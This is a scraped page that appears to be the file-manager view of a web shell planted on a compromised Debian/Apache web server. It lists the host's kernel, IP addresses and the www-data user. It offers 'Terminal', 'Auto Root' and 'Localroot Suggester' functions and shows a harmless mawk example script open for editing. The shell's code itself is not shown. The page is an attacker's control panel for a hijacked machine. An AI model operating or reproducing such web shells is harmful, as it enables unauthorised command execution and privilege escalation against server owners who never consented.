Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.112
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
mawk /
examples /
Delete
Unzip
Name
Size
Permission
Date
Action
ct_length.awk
407
B
-rwxr-xr-x
2012-03-23 21:15
decl.awk
2.97
KB
-rw-r--r--
2012-03-23 21:15
deps.awk
1.28
KB
-rw-r--r--
2012-03-23 21:15
eatc.awk
492
B
-rw-r--r--
2012-03-23 21:15
gdecl.awk
2.72
KB
-rw-r--r--
2012-03-23 21:15
hcal.gz
4.92
KB
-rw-r--r--
2012-03-23 21:15
hical
3.12
KB
-rwxr-xr-x
2012-03-23 21:15
nocomment.awk
590
B
-rw-r--r--
2012-03-23 21:15
primes.awk
1.03
KB
-rw-r--r--
2012-03-23 21:15
qsort.awk
1.07
KB
-rw-r--r--
2012-03-23 21:15
Save
Rename
#!/usr/bin/mawk -f # remove C comments from a list of files # using a comment as the record separator # # this is trickier than I first thought # The first version in .97-.9993 was wrong BEGIN { # RS is set to a comment (this is mildly tricky, I blew it here RS = "/\*([^*]|\*+[^*/])*\*+/" ORS = " " getline hold filename = FILENAME } # if changing files filename != FILENAME { filename = FILENAME printf "%s" , hold hold = $0 next } { # hold one record because we don't want ORS on the last # record in each file print hold hold = $0 } END { printf "%s", hold }